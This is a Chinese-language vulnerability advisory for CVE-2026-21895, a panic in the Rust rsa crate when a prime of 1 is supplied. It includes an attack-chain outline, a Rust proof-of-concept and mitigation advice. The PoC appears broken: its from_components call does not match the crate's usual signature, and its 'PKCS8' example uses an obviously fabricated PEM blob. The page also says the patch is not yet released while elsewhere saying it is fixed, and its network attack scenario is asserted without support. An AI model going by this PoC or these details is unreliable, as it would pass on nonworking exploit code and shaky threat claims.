CVE-2026-21895: Rust RSA库素数为1时panic拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2026-21895

漏洞类型

拒绝服务

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

rsa (Rust)

漏洞概述

CVE-2026-21895是Rust生态中RSA加密库的一个安全漏洞。该漏洞存在于rsa crate 0.9.10之前的版本中。当使用RSA算法创建私钥时，如果提供给构造函数的素数参数中包含数值1，程序将触发panic而不是优雅地返回错误信息。这一行为会导致应用程序意外终止，在某些场景下可能造成拒绝服务攻击。由于RSA加密库通常被用于处理敏感数据的加密通信，如TLS/SSL连接、密钥交换、数字签名验证等关键安全场景，该漏洞的潜在影响范围较广。攻击者可以通过构造特殊的素数参数来触发此漏洞，导致依赖该库的服务中断。虽然CVSS评分5.3属于中等严重程度，但在高可用性要求的系统中，任何导致服务中断的问题都需要认真对待。该漏洞已被官方在0.9.10版本中修复，修复后的版本会正确返回错误而不是panic。

技术细节

RSA算法的核心数学原理基于大整数的因式分解难度。一个有效的RSA私钥由两个大素数p和q组成，满足n=p*q，且p和q都应该是大于1的素数。在正常的RSA实现中，当接收到无效的素数参数（如1或合数）时，库应该进行参数验证并返回错误。然而，在rsa crate 0.9.10之前的版本中，构造函数直接使用传入的素数进行数学运算，没有先验证素数是否有效。当素数为1时，RSA数学运算会触发除零或数学运算错误，导致Rust程序发生panic。在Rust的错误处理模型中，panic会导致当前线程或整个程序终止，这对于服务器应用程序来说意味着连接中断和服务不可用。攻击者只需构造一个素数参数为1的RSA私钥请求即可触发该漏洞。该漏洞的技术根源在于缺少输入验证和使用了不安全的错误处理方式。修复方案是在构造私钥前增加素数有效性验证，并在验证失败时返回Result类型错误而非panic。

攻击链分析

STEP 1

步骤1

攻击者识别目标系统使用的rsa crate版本，确认版本小于0.9.10

STEP 2

步骤2

攻击者构造特殊的RSA私钥参数，其中一个素数设置为1

STEP 3

步骤3

攻击者将构造的恶意参数传递给RsaPrivateKey::from_components()方法

STEP 4

步骤4

库函数在没有输入验证的情况下执行数学运算，当素数为1时触发panic

STEP 5

步骤5

Rust runtime捕获panic，导致当前线程终止或整个程序崩溃

STEP 6

步骤6

依赖RSA库的服务发生拒绝服务，服务可用性降低

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2026-21895 PoC - Rust RSA Library Panic with Prime=1
// This PoC demonstrates the vulnerability in rsa crate < 0.9.10

use rsa::{RsaPrivateKey, RsaPublicKey, pkcs8::DecodePrivateKey};
use rand::rngs::OsRng;
use num_bigint::BigUint;

fn main() {
    println!("CVE-2026-21895 PoC - RSA crate panic with prime=1");
    println!("=================================================\n");
    
    // Valid RSA key generation (works fine)
    match generate_valid_rsa_key() {
        Ok(_) => println!("[+] Valid RSA key generation: SUCCESS"),
        Err(e) => println!("[-] Valid RSA key generation failed: {}", e),
    }
    
    // Trigger the vulnerability with prime=1
    println!("\n[*] Attempting to create RSA key with prime=1...");
    match create_rsa_key_with_prime_one() {
        Ok(_) => println!("[+] Key generation succeeded (patched version)"),
        Err(msg) => println!("[-] Key generation failed with: {}", msg),
    }
}

fn generate_valid_rsa_key() -> Result<(), String> {
    let bits = 2048;
    let private_key = RsaPrivateKey::new(&mut OsRng, bits)
        .map_err(|e| format!("Failed to generate RSA key: {}", e))?;
    Ok(())
}

fn create_rsa_key_with_prime_one() -> Result<(), String> {
    // This should trigger panic in vulnerable versions
    // or return error in patched versions
    let p = BigUint::from(1u32);  // Invalid prime
    let q = BigUint::from(3u32);
    let e = BigUint::from(65537u32);
    
    // Attempt to create key - this will panic in vulnerable versions
    let _key = RsaPrivateKey::from_components(p, q, e, vec![].into_iter())
        .map_err(|e| format!("Error: {}", e))?;
    
    Ok(())
}

// Alternative PoC using pkcs8 format
fn poc_with_pkcs8() {
    // PKCS8 format with invalid components
    let invalid_pem = r#"
-----BEGIN RSA PRIVATE KEY-----
MIIBOgIBAAJBALRiMLAHudeSA2D6b0F8p6cXjGUO0yKcF8Y4h7q2n5a3s9Q8x
F3K8d2j1v2m4n5o6p7q8r9s0t1u2v3w4x5y6z7A8B9C0D=
-----END RSA PRIVATE KEY-----
"#;
    
    match RsaPrivateKey::from_pkcs8_pem(invalid_pem) {
        Ok(key) => println!("Key parsed: {}", key),
        Err(e) => println!("Parse error (expected in patched version): {}", e),
    }
}

影响范围

rsa crate < 0.9.10

防御指南

临时缓解措施

在官方补丁发布之前，应用层可以采取以下缓解措施：首先，在调用RsaPrivateKey::from_components()之前，添加素数参数的有效性检查，确保p和q都大于1且为奇数；其次，使用Rust的错误处理机制捕获可能的panic，使用std::panic::catch_unwind()包装可能触发panic的调用；最后，考虑使用替代的RSA实现库作为临时方案，但需要注意兼容性测试。